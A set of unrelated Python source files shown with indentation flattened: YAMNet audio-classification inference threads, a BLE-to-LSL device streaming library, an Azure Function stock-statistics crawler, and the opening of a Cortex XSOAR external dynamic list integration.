Reference: https://tfhub.dev/google/lite-model/yamnet/classification/tflite/1
"""
def init(self):
self.model_path = self.get_config().get("--tf-model", "model/")
logger.debug('Tensorflow model: "{}"'.format(self.model_path))
logger.debug("Loading model...")
self.model = tf.lite.Interpreter(self.model_path)
logger.debug("Loading model... DONE")
logger.debug("Loading model labels...")
labels_file = zipfile.ZipFile(self.model_path).open("yamnet_label_list.txt")
self.model_labels = [l.decode("utf-8").strip() for l in labels_file.readlines()]
logger.debug("Loading model labels... DONE")
logger.debug("Setting model stuff up...")
interpreter = self.model
self.input_details = interpreter.get_input_details()
self.waveform_input_index = self.input_details[0]["index"]
self.output_details = interpreter.get_output_details()
self.scores_output_index = self.output_details[0]["index"]
interpreter.allocate_tensors()
logger.debug("Setting model stuff up... DONE")
self.get_event_manager().add_listener("new_audio_data", self._recv_audio_data)
self.running = True
@classmethod
def run_inference_thread(cls, system: TfYamnetLiteSystem):
while system.running:
if not system.model or not system.model_labels:
logger.warning("Model not ready.")
continue
if not system.raw_audio_buffer:
continue
interpreter = system.model
pcm_int16 = np.frombuffer(system.raw_audio_buffer, dtype=np.int16)
num_samples = int(0.975 * system.model_sample_rate)
num_to_pad = num_samples - pcm_int16.size
if num_to_pad < 0:
num_to_pad = 0
num_to_pad += 2
waveform = np.pad(pcm_int16, (0, num_to_pad))
int16_iinfo = np.iinfo(np.int16)
waveform[-1] = int16_iinfo.max
waveform[-2] = int16_iinfo.min
waveform = waveform.astype(np.float32)
waveform = minmax_scale(waveform, feature_range=(-1, 1), copy=False)
waveform = waveform[:num_samples]
# interpreter.resize_tensor_input(
# system.waveform_input_index, [waveform.size], strict=True
# )
# interpreter.allocate_tensors()
interpreter.set_tensor(system.waveform_input_index, waveform)
start = time.time()
interpreter.invoke()
scores = interpreter.get_tensor(system.scores_output_index)
end = time.time()
top_class_index = scores.argmax()
top_results = tf.math.top_k(scores, k=10)
top_class_indices = top_results.indices[0].numpy()
top_class_probs = top_results.values[0].numpy()
# logger.debug("Detected: {}".format(system.model_labels[top_class_index]))
# logger.debug(
# "Detected (took {:.3f}s): {}".format(
# (end - start),
# ", ".join(
# [
# "{} ({:.3f})".format(
# system.model_labels[idx], scores[0][idx]
# )
# for idx in top_class_indices
# ]
# ),
# )
# )
system.get_event_manager().queue_event(
"detected_classes",
{
"begin_timestamp": system.raw_audio_utc_begin,
"classes": [
{
"label": system.model_labels[idx],
"score": scores[0][idx],
}
for idx in top_class_indices
],
},
)
logger.debug("Reaching the end of the model inference thread.")
class TfYamnetSavedmodelSystem(BaseTfYamnetSystem):
def init(self) -> None:
self.model_path = self.get_config().get("--tf-model", "model/")
logger.debug('Tensorflow model: "{}"'.format(self.model_path))
logger.debug("Loading model...")
self.model = tf.saved_model.load(self.model_path)
logger.debug("Loading model... DONE")
def class_names_from_csv(class_map_csv_text):
"""Returns list of class names corresponding to score vector."""
import csv
import io
class_map_csv = io.StringIO(class_map_csv_text)
class_names = [
display_name
for (class_index, mid, display_name) in csv.reader(class_map_csv)
]
class_names = class_names[1:] # Skip CSV header
return class_names
class_map_path = self.model.class_map_path().numpy()
self.model_labels = class_names_from_csv(
tf.io.read_file(class_map_path).numpy().decode("utf-8")
)
self.get_event_manager().add_listener("new_audio_data", self._recv_audio_data)
self.running = True
@classmethod
def run_inference_thread(cls, system: TfYamnetSavedmodelSystem):
last_time = time.time()
cumu_time_s = 0.
while system.running:
now_time = time.time()
target_time_per_frame_s = 1.0 / system.inference_max_fps
frame_time_so_far_s = now_time - last_time
cumu_time_s += frame_time_so_far_s
last_time = now_time
if cumu_time_s < target_time_per_frame_s and system.sleep:
time.sleep(target_time_per_frame_s - cumu_time_s)
continue
else:
cumu_time_s -= target_time_per_frame_s
if not system.model or not system.model_labels:
logger.warning("Model not ready.")
continue
if not system.raw_audio_buffer:
continue
pcm_int16 = np.frombuffer(system.raw_audio_buffer, dtype=np.int16)
num_samples = int(0.975 * system.model_sample_rate)
# Pad the waveform to the model required sample length + 2 so we can
# add the integer min and max to make sure scaling is relative to the
# the type min/max.
num_to_pad = num_samples - pcm_int16.size
if num_to_pad < 0:
num_to_pad = 0
num_to_pad += 2
waveform = np.pad(pcm_int16, (0, num_to_pad))
int16_iinfo = np.iinfo(np.int16)
waveform[-1] = int16_iinfo.max
waveform[-2] = int16_iinfo.min
waveform = waveform.astype(np.float32)
waveform = minmax_scale(waveform, feature_range=(-1, 1), copy=False)
waveform = waveform[:-2]
# Run the model, check the output.
start = time.time()
scores, embeddings, log_mel_spectrogram = system.model(waveform)
end = time.time()
scores.shape.assert_is_compatible_with([None, 521])
embeddings.shape.assert_is_compatible_with([None, 1024])
log_mel_spectrogram.shape.assert_is_compatible_with([None, 64])
scores_max = tf.reduce_max(scores, axis=0)
top_results = tf.math.top_k(scores_max, k=10)
top_class_indices = top_results.indices.numpy()
top_class_probs = top_results.values.numpy()
# logger.debug("Detected: {}".format(system.model_labels[top_class_index]))
# logger.debug(
# "Detected (took {:.3f}s): {}".format(
# (end - start),
# ", ".join(
# [
# "{} ({:.3f})".format(
# system.model_labels[idx], scores_max[idx]
# )
# for idx in top_class_indices
# ]
# ),
# )
# )
system.get_event_manager().queue_event(
"detected_classes",
{
"begin_timestamp": system.raw_audio_utc_begin,
"classes": [
{
"label": system.model_labels[idx],
"score": scores_max[idx],
}
for idx in top_class_indices
],
},
)
class TfYamnetSystem(BaseSystem):
"""
A wrapper system that determines which Yamnet system to load base on configs.
"""
_system: BaseSystem = None
def init(self) -> None:
model_path = self.get_config()["--tf-model"]
if model_path.endswith("tflite"):
self._system = TfYamnetLiteSystem(
app=self.get_app(), config=self.get_config()
)
else:
self._system = TfYamnetSavedmodelSystem(
app=self.get_app(), config=self.get_config()
)
return self._system.init()
def shutdown(self) -> None:
self._system.shutdown()
def recv_audio_data(self, event_type, audio_event) -> None:
audio_seg = ad.from_numpy_array(audio_event.data, framerate=audio_event.rate)
# resample the audio to rate needed by the model.
resampled_audio_seg = audio_seg.resample(
sample_rate_Hz=16000, sample_width=2, channels=1
)
if self.raw_audio_buffer is None:
self.raw_audio_buffer = resampled_audio_seg.seg.raw_data
else:
temp = self.raw_audio_buffer + resampled_audio_seg.seg.raw_data
self.raw_audio_buffer = temp[-self.model_sample_rate :]
def run(self) -> None:
self._system.run()
|
ble2lsl.py
|
"""Interfacing between Bluetooth Low Energy and Lab Streaming Layer protocols.
Interfacing with devices over Bluetooth Low Energy (BLE) is achieved using the
`Generic Attribute Profile`_ (GATT) standard procedures for data transfer.
Reading and writing of GATT descriptors is provided by the `pygatt`_ module.
All classes streaming data through an LSL outlet should subclass
`BaseStreamer`.
Also includes dummy streamer objects, which do not acquire data over BLE but
pass local data through an LSL outlet, e.g. for testing.
TODO:
* AttrDict for attribute-like dict access from device PARAMS?
.. _Generic Attribute Profile:
https://www.bluetooth.com/specifications/gatt/generic-attributes-overview
.. _pygatt:
https://github.com/peplin/pygatt
"""
from ble2lsl import utils
import json
from queue import Queue
from struct import error as StructError
import threading
import time
from warnings import warn
import numpy as np
import pygatt
from pygatt.backends.bgapi.exceptions import ExpectedResponseTimeout
import pylsl as lsl
import serial
INFO_ARGS = ['type', 'channel_count', 'nominal_srate', 'channel_format']
class BaseStreamer:
"""Base class for streaming data through an LSL outlet.
Prepares `pylsl.StreamInfo` and `pylsl.StreamOutlet` objects as well as
data buffers for handling of incoming chunks.
Subclasses must implement `start` and `stop` methods for stream control.
TODO:
* Public access to outlets and stream info?
* Push chunks, not samples (have to generate intra-chunk timestamps anyway)
"""
def __init__(self, device, subscriptions=None, time_func=time.time,
ch_names=None, **kwargs):
"""Construct a `BaseStreamer` object.
Args:
device: A device module in `ble2lsl.devices`.
time_func (function): Function for generating timestamps.
subscriptions (Iterable[str]): Types of device data to stream.
Some subset of `SUBSCRIPTION_NAMES`.
ch_names (dict[Iterable[str]]): User-defined channel names.
e.g. `{'EEG': ('Ch1', 'Ch2', 'Ch3', 'Ch4')}`.
"""
self._device = device
if subscriptions is None:
subscriptions = get_default_subscriptions(device)
self._subscriptions = tuple(subscriptions)
self._time_func = time_func
self._user_ch_names = ch_names if ch_names is not None else {}
self._stream_params = self._device.PARAMS.streams
self._chunk_idxs = stream_idxs_zeros(self._subscriptions)
self._chunks = empty_chunks(self._stream_params,
self._subscriptions)
# StreamOutlet.push_chunk doesn't like single-sample chunks...
# but want to keep using push_chunk for intra-chunk timestamps
# doing this beforehand to avoid a chunk size check for each push
chunk_size = self._stream_params.chunk_size
self._push_func = {name: (self._push_chunk_as_sample
if chunk_size[name] == 1
else self._push_chunk)
for name in self._subscriptions}
def start(self):
"""Begin streaming through the LSL outlet."""
raise NotImplementedError()
def stop(self):
"""Stop/pause streaming through the LSL outlet."""
raise NotImplementedError()
def _init_lsl_outlets(self):
"""Call in subclass after acquiring address."""
self._info = {}
self._outlets = {}
for name in self._subscriptions:
info = {arg: self._stream_params[arg][name] for arg in INFO_ARGS}
outlet_name = '{}-{}'.format(self._device_id, name)
self._info[name] = lsl.StreamInfo(outlet_name, **info,
source_id=self._device_id)
self._add_device_info(name)
chunk_size = self._stream_params.chunk_size[name]
self._outlets[name] = lsl.StreamOutlet(self._info[name],
chunk_size=chunk_size,
max_buffered=360)
def _push_chunk(self, name, timestamp):
self._outlets[name].push_chunk(self._chunks[name].tolist(),
timestamp)
def _push_chunk_as_sample(self, name, timestamp):
self._outlets[name].push_sample(self._chunks[name].tolist()[0],
timestamp)
def _add_device_info(self, name):
"""Adds device-specific parameters to `info`."""
desc = self._info[name].desc()
try:
desc.append_child_value("manufacturer", self._device.MANUFACTURER)
except KeyError:
warn("Manufacturer not specified in device file")
desc.append_child_value("address", self._address)
channels = desc.append_child("channels")
try:
ch_names = self._stream_params.ch_names[name]
# use user-specified ch_names if available and right no. channels
if name in self._user_ch_names:
user_ch_names = self._user_ch_names[name]
if len(user_ch_names) == len(ch_names):
if len(user_ch_names) == len(set(user_ch_names)):
ch_names = user_ch_names
else:
print("Non-unique names in user-defined {} ch_names; "
.format(name), "using default ch_names.")
else:
print("Wrong # of channels in user-defined {} ch_names; "
.format(name), "using default ch_names.")
for c, ch_name in enumerate(ch_names):
unit = self._stream_params.units[name][c]
type_ = self._stream_params.type[name]
channels.append_child("channel") \
.append_child_value("label", ch_name) \
.append_child_value("unit", unit) \
.append_child_value("type", type_)
except KeyError:
raise ValueError("Channel names, units, or types not specified")
@property
def subscriptions(self):
"""The names of the subscribed streams."""
return self._subscriptions
class Streamer(BaseStreamer):
"""Streams data to an LSL outlet from a BLE device.
TODO:
* Try built-in LSL features for intra-chunk timestamps (StreamOutlet)
* initialize_timestamping: should indices be reset to 0 mid-streaming?
"""
def __init__(self, device, address=None, backend='bgapi', interface=None,
autostart=True, scan_timeout=10.5, internal_timestamps=False,
**kwargs):
"""Construct a `Streamer` instance for a given device.
Args:
device (dict): A device module in `ble2lsl.devices`.
For example, `ble2lsl.devices.muse2016`.
Provides info on BLE characteristics and device metadata.
address (str): Device MAC address for establishing connection.
By default, this is acquired automatically using device name.
backend (str): Which `pygatt` backend to use.
Allowed values are `'bgapi'` or `'gatt'`. The `'gatt'` backend
only works on Linux under the BlueZ protocol stack.
interface (str): The identifier for the BLE adapter interface.
When `backend='gatt'`, defaults to `'hci0'`.
autostart (bool): Whether to start streaming on instantiation.
scan_timeout (float): Seconds before timeout of BLE adapter scan.
internal_timestamps (bool): Use internal timestamping.
If `False` (default), uses initial timestamp, nominal sample
rate, and device-provided sample ID to determine timestamp.
If `True` (or when sample IDs not provided), generates
timestamps at the time of chunk retrieval, only using
nominal sample rate as need to determine timestamps within
chunks.
"""
BaseStreamer.__init__(self, device=device, **kwargs)
self._transmit_queue = Queue()
self._ble_params = self._device.PARAMS.ble
self._address = address
# use internal timestamps if requested, or if stream is variable rate
# (LSL uses nominal_srate=0.0 for variable rates)
nominal_srates = self._stream_params.nominal_srate
self._internal_timestamps = {name: (internal_timestamps
if nominal_srates[name] else True)
for name in device.STREAMS}
self._start_time = stream_idxs_zeros(self._subscriptions)
self._first_chunk_idxs = stream_idxs_zeros(self._subscriptions)
# initialize gatt adapter
if backend == 'bgapi':
self._adapter = pygatt.BGAPIBackend(serial_port=interface)
elif backend in ['gatt', 'bluez']:
# only works on Linux
interface = self.interface or 'hci0'
self._adapter = pygatt.GATTToolBackend(interface)
else:
raise(ValueError("Invalid backend specified; use bgapi or gatt."))
self._backend = backend
self._scan_timeout = scan_timeout
self._transmit_thread = threading.Thread(target=self._transmit_chunks)
if autostart:
self.connect()
self.start()
def _init_timestamp(self, name, chunk_idx):
"""Set the starting timestamp and chunk index for a subscription."""
self._first_chunk_idxs[name] = chunk_idx
self._start_time[name] = self._time_func()
def start(self):
"""Start streaming by writing to the send characteristic."""
self._transmit_thread.start()
self._ble_device.char_write(self._ble_params['send'],
value=self._ble_params['stream_on'],
wait_for_response=False)
def stop(self):
"""Stop streaming by writing to the send characteristic."""
self._ble_device.char_write(self._ble_params["send"],
value=self._ble_params["stream_off"],
wait_for_response=False)
def send_command(self, value):
"""Write some value to the send characteristic."""
self._ble_device.char_write(self._ble_params["send"],
value=value,
wait_for_response=False)
def disconnect(self):
"""Disconnect from the BLE device and stop the adapter.
Note:
After disconnection, `start` will not resume streaming.
TODO:
* enable device reconnect with `connect`
"""
self.stop() # stream_off command
self._ble_device.disconnect() # BLE disconnect
self._adapter.stop()
def connect(self, max_attempts=20):
"""Establish connection to BLE device (prior to `start`).
Starts the `pygatt` adapter, resolves the device address if necessary,
connects to the device, and subscribes to the channels specified in the
device parameters.
"""
for _ in range(max_attempts):
try:
self._adapter.start()
break
except pygatt.exceptions.NotConnectedError as notconnected_error:
# dongle not connected
continue
except (ExpectedResponseTimeout, StructError):
continue
except OSError as os_error:
if os_error.errno == 6:
# "device not configured"
print(os_error)
continue
else:
raise os_error
except serial.serialutil.SerialException as serial_exception:
# NOTE: some of these may be raised (apparently harmlessly) by
# the self._adapter._receiver thread, which can't be captured
# here; maybe there is a way to prevent writing to stdout though
if serial_exception.errno == 6:
# "couldn't open port"
print(serial_exception)
continue
else:
raise serial_exception
except pygatt.backends.bgapi.exceptions.BGAPIError as bgapi_error:
# adapter not connected?
continue
time.sleep(0.1)
if self._address is None:
# get the device address if none was provided
self._device_id, self._address = \
self._resolve_address(self._device.NAME)
try:
self._ble_device = self._adapter.connect(self._address,
address_type=self._ble_params['address_type'],
interval_min=self._ble_params['interval_min'],
interval_max=self._ble_params['interval_max'])
except pygatt.exceptions.NotConnectedError:
e_msg = "Unable to connect to device at address {}" \
.format(self._address)
raise(IOError(e_msg))
# initialize LSL outlets and packet handler
self._init_lsl_outlets()
self._packet_handler = self._device.PacketHandler(self)
# subscribe to receive characteristic notifications
process_packet = self._packet_handler.process_packet
for name in self._subscriptions:
try:
uuids = [self._ble_params[name] + '']
except TypeError:
uuids = self._ble_params[name]
for uuid in uuids:
if uuid:
self._ble_device.subscribe(uuid, callback=process_packet)
# subscribe to recieve simblee command from ganglion doc
def _resolve_address(self, name):
list_devices = self._adapter.scan(timeout=self._scan_timeout)
for device in list_devices:
if name in device['name']:
return device['name'], device['address']
raise(ValueError("No devices found with name `{}`".format(name)))
def _transmit_chunks(self):
"""TODO: missing chunk vs. missing sample"""
# nominal duration of chunks for progressing non-internal timestamps
chunk_period = {name: (self._stream_params.chunk_size[name]
/ self._stream_params.nominal_srate[name])
for name in self._subscriptions
if not self._internal_timestamps[name]}
first_idx = self._first_chunk_idxs
while True:
name, chunk_idx, chunk = self._transmit_queue.get()
self._chunks[name][:, :] = chunk
# update chunk index records and report missing chunks
# passing chunk_idx=-1 to the queue averts this (ex. status stream)
if not chunk_idx == -1:
if self._chunk_idxs[name] == 0:
self._init_timestamp(name, chunk_idx)
self._chunk_idxs[name] = chunk_idx - 1
if not chunk_idx == self._chunk_idxs[name] + 1:
print("Missing {} chunk {}: {}"
.format(name, chunk_idx, self._chunk_idxs[name]))
self._chunk_idxs[name] = chunk_idx
else:
# track number of received chunks for non-indexed streams
self._chunk_idxs[name] += 1
# generate timestamp; either internally or
if self._internal_timestamps[name]:
timestamp = self._time_func()
else:
timestamp = chunk_period[name] * (chunk_idx - first_idx[name])
timestamp += self._start_time[name]
self._push_func[name](name, timestamp)
@property
def backend(self):
"""The name of the `pygatt` backend used by the instance."""
return self._backend
@property
def address(self):
"""The MAC address of the device."""
return self._address
class Dummy(BaseStreamer):
"""Mimicks a device and pushes local data into an LSL outlet.
TODO:
* verify timestamps/delays (seems too fast in plot.Lines)
"""
def __init__(self, device, chunk_iterator=None, subscriptions=None,
autostart=True, mock_address="DUMMY", **kwargs):
"""Construct a `Dummy` instance.
Args:
device: BLE device to impersonate (i.e. from `ble2lsl.devices`).
chunk_iterator (generator): Class that iterates through chunks.
autostart (bool): Whether to start streaming on instantiation.
"""
nominal_srate = device.PARAMS.streams.nominal_srate
if subscriptions is None:
subscriptions = get_default_subscriptions(device)
subscriptions = {name for name in subscriptions
if nominal_srate[name] > 0}
BaseStreamer.__init__(self, device=device, subscriptions=subscriptions,
**kwargs)
self._device_id = "{}-{}".format(device.NAME, mock_address)
self._address = mock_address
self._init_lsl_outlets()
chunk_shapes = {name: self._chunks[name].shape
for name in self._subscriptions}
self._delays = {name: 1 / (nominal_srate[name] / chunk_shapes[name][1])
for name in self._subscriptions}
# generate or load fake data
if chunk_iterator is None:
chunk_iterator = NoisySinusoids
self._chunk_iter = chunk_iterator
# threads to mimic incoming BLE data
self._threads = {name: threading.Thread(target=self._stream,
kwargs=dict(name=name))
for name in self._subscriptions}
if autostart:
self.start()
def start(self):
"""Start pushing data into the LSL outlet."""
self._proceed = True
for name in self._subscriptions:
self._threads[name].start()
def stop(self):
"""Stop pushing data. Ends execution of chunk streaming threads.
Restart requires a new `Dummy` instance.
"""
self._proceed = False
def _stream(self, name):
"""Run in thread to mimic periodic hardware input."""
for chunk in self._chunk_iter[name]:
if not self._proceed:
# dummy has received stop signal
break
self._chunks[name] = chunk
timestamp = time.time()
self._push_func[name](name, timestamp)
delay = self._delays[name]
# some threads may have long delays;
# subdivide these so threads can stop within ~1 s
while delay > 1 and self._proceed:
time.sleep(1)
delay -= 1
time.sleep(delay % 1)
def make_chunk(self, chunk_ind):
"""Prepare a chunk from the totality of local data.
TODO:
* replaced when using an iterator
"""
self._chunks
# TODO: more realistic timestamps
timestamp = self._time_func()
self._timestamps = np.array([timestamp]*self._chunk_size)
class Replay(Dummy):
def __init__(self, device, path, loop=False, autostart=True, **kwargs):
# with open("tmp.log", "w") as f:
# f.write(json.dumps(chunk_iterator))
chunk_iterator = utils.stream_collect(path, device).read_stream()["CSV"]
super().__init__(device, mock_address="REPLAY",
chunk_iterator=chunk_iterator, autostart=autostart,
**kwargs)
def _stream(self, name):
"""Run in thread to mimic periodic hardware input."""
data = self._chunk_iter[name].start()
for chunk in data:
if not self._proceed:
# dummy has received stop signal
break
self._chunks[name] = chunk[:, 1:]
timestamp = chunk[0, 0]
self._push_func[name](name, timestamp)
delay = self._delays[name]
time.sleep(delay)
def stream_idxs_zeros(subscriptions):
"""Initialize an integer index for each subscription."""
idxs = {name: 0 for name in subscriptions}
return idxs
def empty_chunks(stream_params, subscriptions):
"""Initialize an empty chunk array for each subscription."""
chunks = {name: np.zeros((stream_params.chunk_size[name],
stream_params.channel_count[name]),
dtype=stream_params.numpy_dtype[name])
for name in subscriptions}
return chunks
def get_default_subscriptions(device, pos_rate=False):
# look for default list; if unavailable, subscribe to all
try:
subscriptions = device.DEFAULT_SUBSCRIPTIONS
except AttributeError:
subscriptions = device.STREAMS
if pos_rate:
subscriptions = [name for name in subscriptions
if device.PARAMS.streams.nominal_srate[name] > 0]
return subscriptions
class ChunkIterator:
"""Generator object (i.e. iterator) that yields chunks.
Placeholder until I figure out how this might work as a base class.
"""
def __init__(self, chunk_shape, srate):
self._chunk_shape = chunk_shape
self._srate = srate
class NoisySinusoids(ChunkIterator):
"""Iterator class to provide noisy sinusoidal chunks of data."""
def __init__(self, chunk_shape, srate, freqs=[5, 10, 12, 20], noise_std=1):
super().__init__(chunk_shape=chunk_shape, srate=srate)
self._ang_freqs = 2 * np.pi * np.array(freqs)
self._speriod = 1 / self._srate
self._chunk_t_incr = (1 + chunk_shape[0]) / self._srate
self._freq_amps = np.random.randint(1, 5, len(freqs))
self._noise_std = noise_std
def __iter__(self):
self._t = (np.arange(self._chunk_shape[0]).reshape((-1, 1))
* self._speriod)
return self
def __next__(self):
# start with noise
chunk = np.random.normal(0, self._noise_std, self._chunk_shape)
# sum frequencies with random amplitudes
for i, freq in enumerate(self._ang_freqs):
chunk += self._freq_amps[i] * np.sin(freq * self._t)
self._t += self._chunk_t_incr
return chunk
class FileIterator(ChunkIterator):
def __init__(self, path):
self._path = self._path_check(path)
self._files = self._scan_files(self._path)
self._name_pattern = re.compile(self._choose_files(self._files))
def __iter__(self):
return self
def __next__(self):
return chunk
|
__init__.py
|
import datetime
import logging
import azure.functions as func
import json
import pathlib
import threading
import time
import array
import requests
from .crawler import Crawler
from .model.company import Company
from .model.status_processing import StatusProcessing
from typing import List
from dateutil.relativedelta import relativedelta
from configuration_manager.reader import reader
SETTINGS_FILE_PATH = pathlib.Path(
__file__).parent.parent.__str__() + "//local.settings.json"
def main(req: func.HttpRequest) -> func.HttpResponse:
utc_timestamp = datetime.datetime.utcnow().replace(
tzinfo=datetime.timezone.utc).isoformat()
try:
logging.info("Timer job 'sosi_func0007_company_statistics' has begun")
config_obj: reader = reader(SETTINGS_FILE_PATH, 'Values')
post_service_url: str = config_obj.get_value("post_service_url")
url_key_statistics: str = config_obj.get_value("url_key_statistics")
url_gross_debit_over_ebitida: str = config_obj.get_value("url_gross_debit_over_ebitida")
url_return_equity_dividend_yield: str = config_obj.get_value("url_return_equity_dividend_yield")
# Messages
ERR_CODE_REQUIRED = "Stock code is required"
ERR_STOCK_NOT_PROCESSED = "{} was not processed"
SUCCESS_STOCK_PROCESSED = "{} processed"
if (not req) or len(req.params) == 0 or (not req.params.get("code")):
logging.error(ERR_CODE_REQUIRED)
return func.HttpResponse(body=json.dumps(StatusProcessing(False, ERR_CODE_REQUIRED).__dict__), status_code=204)
stock_code: str = str(req.params.get("code"))
crawler_obj: Crawler = Crawler(url_key_statistics, url_gross_debit_over_ebitida, url_return_equity_dividend_yield, utc_timestamp)
company_data: Company = crawler_obj.get_data(stock_code)
if company_data:
json_obj = json.dumps(company_data.__dict__, default=lambda o: o.__dict__)
# TODO: At the time, we're not caring about the microservice response here
threading.Thread(target=post_data, args=(post_service_url, json_obj)).start()
return func.HttpResponse(body=json.dumps(StatusProcessing(True, SUCCESS_STOCK_PROCESSED.format(stock_code)).__dict__), status_code=200)
else:
logging.warn(ERR_STOCK_NOT_PROCESSED.format(stock_code))
return func.HttpResponse(body=json.dumps(StatusProcessing(False, ERR_STOCK_NOT_PROCESSED.format(stock_code)).__dict__), status_code=500)
pass
except Exception as ex:
error_log = '{} -> {}'.format(utc_timestamp, str(ex))
logging.exception(error_log)
return func.HttpResponse(body=json.dumps(StatusProcessing(False, error_log, ex).__dict__), status_code=500)
pass
def post_data(url, json):
headers = {
'content-type': "application/json",
'cache-control': "no-cache",
'content-length': str(len(str(json).encode('utf-8')))
}
requests.request("POST", url, data=json, headers=headers)
pass
|
EDL.py
|
import demistomock as demisto
from CommonServerPython import *
from CommonServerUserPython import *
import re
from base64 import b64decode
from multiprocessing import Process
from gevent.pywsgi import WSGIServer
from tempfile import NamedTemporaryFile
from flask import Flask, Response, request
from netaddr import IPAddress, IPSet
from typing import Callable, List, Any, Dict, cast, Tuple
from ssl import SSLContext, SSLError, PROTOCOL_TLSv1_2
class Handler:
@staticmethod
def write(msg: str):
demisto.info(msg)
''' GLOBAL VARIABLES '''
INTEGRATION_NAME: str = 'EDL'
PAGE_SIZE: int = 200
DEMISTO_LOGGER: Handler = Handler()
APP: Flask = Flask('demisto-edl')
EDL_VALUES_KEY: str = 'dmst_edl_values'
EDL_LIMIT_ERR_MSG: str = 'Please provide a valid integer for EDL Size'
EDL_OFFSET_ERR_MSG: str = 'Please provide a valid integer for Starting Index'
EDL_COLLAPSE_ERR_MSG: str = 'The Collapse parameter can only get the following: 0 - Dont Collapse, ' \
'1 - Collapse to Ranges, 2 - Collapse to CIDRS'
EDL_MISSING_REFRESH_ERR_MSG: str = 'Refresh Rate must be "number date_range_unit", examples: (2 hours, 4 minutes, ' \
'6 months, 1 day, etc.)'
''' REFORMATTING REGEXES '''
_PROTOCOL_REMOVAL = re.compile('^(?:[a-z]+:)*//')
_PORT_REMOVAL = re.compile(r'^((?:[a-z]+:)*//([a-z0-9\-\.]+)|([a-z0-9\-\.]+))(?:\:[0-9]+)*')
_URL_WITHOUT_PORT = r'\g<1>'
_INVALID_TOKEN_REMOVAL = re.compile(r'(?:[^\./+=\?&]+\*[^\./+=\?&]*)|(?:[^\./+=\?&]*\*[^\./+=\?&]+)')
DONT_COLLAPSE = "Don't Collapse"
COLLAPSE_TO_CIDR = "To CIDRS"
COLLAPSE_TO_RANGES = "To Ranges"
'''Request Arguments Class'''
class RequestArguments:
def __init__(self,
query: str,
limit: int = 10000,
offset: int = 0,
url_port_stripping: bool = False,
drop_invalids: bool = False,
collapse_ips: str = DONT_COLLAPSE):
self.query = query
self.limit = limit
self.offset = offset
self.url_port_stripping = url_port_stripping
self.drop_invalids = drop_invalids
self.collapse_ips = collapse_ips
def is_request_change(self, last_update_data: Dict):
if self.limit != last_update_data.get('last_limit'):
return True
elif self.offset != last_update_data.get('last_offset'):
return True
elif self.drop_invalids != last_update_data.get('drop_invalids'):
return True
elif self.url_port_stripping != last_update_data.get('url_port_stripping'):
return True
elif self.collapse_ips != last_update_data.get('collapse_ips'):
return True
return False
''' HELPER FUNCTIONS '''
def list_to_str(inp_list: list, delimiter: str = ',', map_func: Callable = str) -> str:
"""
Transforms a list to an str, with a custom delimiter between each list item
"""
str_res = ""
if inp_list:
if isinstance(inp_list, list):
str_res = delimiter.join(map(map_func, inp_list))
else:
raise AttributeError('Invalid inp_list provided to list_to_str')
return str_res
def get_params_port(params: dict = demisto.params()) -> int:
"""
Gets port from the integration parameters
"""
port_mapping: str = params.get('longRunningPort', '')
err_msg: str
port: int
if port_mapping:
err_msg = f'Listen Port must be an integer. {port_mapping} is not valid.'
if ':' in port_mapping:
port = try_parse_integer(port_mapping.split(':')[1], err_msg)
else:
port = try_parse_integer(port_mapping, err_msg)
else:
raise ValueError('Please provide a Listen Port.')
return port
def refresh_edl_context(request_args: RequestArguments) -> str:
"""
Refresh the cache values and format using an indicator_query to call demisto.searchIndicators
Parameters:
request_args: Request arguments
Returns: List(IoCs in output format)
"""
now = datetime.now()
# poll indicators into edl from demisto
iocs = find_indicators_to_limit(request_args.query, request_args.limit, request_args.offset)
out_dict, actual_indicator_amount = create_values_for_returned_dict(iocs, request_args)
while actual_indicator_amount < request_args.limit:
# from where to start the new poll and how many results should be fetched
new_offset = len(iocs) + request_args.offset + actual_indicator_amount - 1
new_limit = request_args.limit - actual_indicator_amount
# poll additional indicators into list from demisto
new_iocs = find_indicators_to_limit(request_args.query, new_limit, new_offset)
# in case no additional indicators exist - exit
if len(new_iocs) == 0:
break
# add the new results to the existing results
iocs += new_iocs
# reformat the output
out_dict, actual_indicator_amount = create_values_for_returned_dict(iocs, request_args)
out_dict["last_run"] = date_to_timestamp(now)
out_dict["current_iocs"] = [{'value': ioc.get('value'), 'indicator_type': ioc.get('indicator_type')}
for ioc in iocs]
set_integration_context(out_dict)
return out_dict[EDL_VALUES_KEY]
def find_indicators_to_limit(indicator_query: str, limit: int, offset: int = 0) -> list:
"""
Finds indicators using demisto.searchIndicators
Parameters:
indicator_query (str): Query that determines which indicators to include in
the EDL (Cortex XSOAR indicator query syntax)
limit (int): The maximum number of indicators to include in the EDL
offset (int): The starting index from which to fetch incidents
Returns:
list: The IoCs list up until the amount set by 'limit'
"""
if offset:
next_page = int(offset / PAGE_SIZE)
# set the offset from the starting page
offset_in_page = offset - (PAGE_SIZE * next_page)
else:
next_page = 0
offset_in_page = 0
# the second returned variable is the next page - it is implemented for a future use of repolling
iocs, _ = find_indicators_to_limit_loop(indicator_query, limit, next_page=next_page)
# if offset in page is bigger than the amount of results returned return empty list
if len(iocs) <= offset_in_page:
return []
return iocs[offset_in_page:limit + offset_in_page]
def find_indicators_to_limit_loop(indicator_query: str, limit: int, total_fetched: int = 0,
next_page: int = 0, last_found_len: int = PAGE_SIZE):
"""
Finds indicators using while loop with demisto.searchIndicators, and returns result and last page
Parameters:
indicator_query (str): Query that determines which indicators to include in
the EDL (Cortex XSOAR indicator query syntax)
limit (int): The maximum number of indicators to include in the EDL
total_fetched (int): The amount of indicators already fetched
next_page (int): The page we are up to in the loop
last_found_len (int): The amount of indicators found in the last fetch
Returns:
(tuple): The iocs and the last page
"""
iocs: List[dict] = []
if not last_found_len:
last_found_len = total_fetched
while last_found_len == PAGE_SIZE and limit and total_fetched < limit:
fetched_iocs = demisto.searchIndicators(query=indicator_query, page=next_page, size=PAGE_SIZE).get('iocs')
# In case the result from searchIndicators includes the key `iocs` but it's value is None
fetched_iocs = fetched_iocs or []
iocs.extend(fetched_iocs)
last_found_len = len(fetched_iocs)
total_fetched += last_found_len
next_page += 1
return iocs, next_page
def ip_groups_to_cidrs(ip_range_groups: list):
"""Collapse ip groups list to CIDRs
Args:
ip_range_groups (list): a list of lists containing connected IPs
Returns:
list. a list of CIDRs.
"""
ip_ranges = [] # type:List
for cidr in ip_range_groups:
# handle single ips
if len(cidr) == 1:
# CIDR with a single IP appears with "/32" suffix so handle them differently
ip_ranges.append(str(cidr[0]))
continue
ip_ranges.append(str(cidr))
return ip_ranges
def ip_groups_to_ranges(ip_range_groups: list):
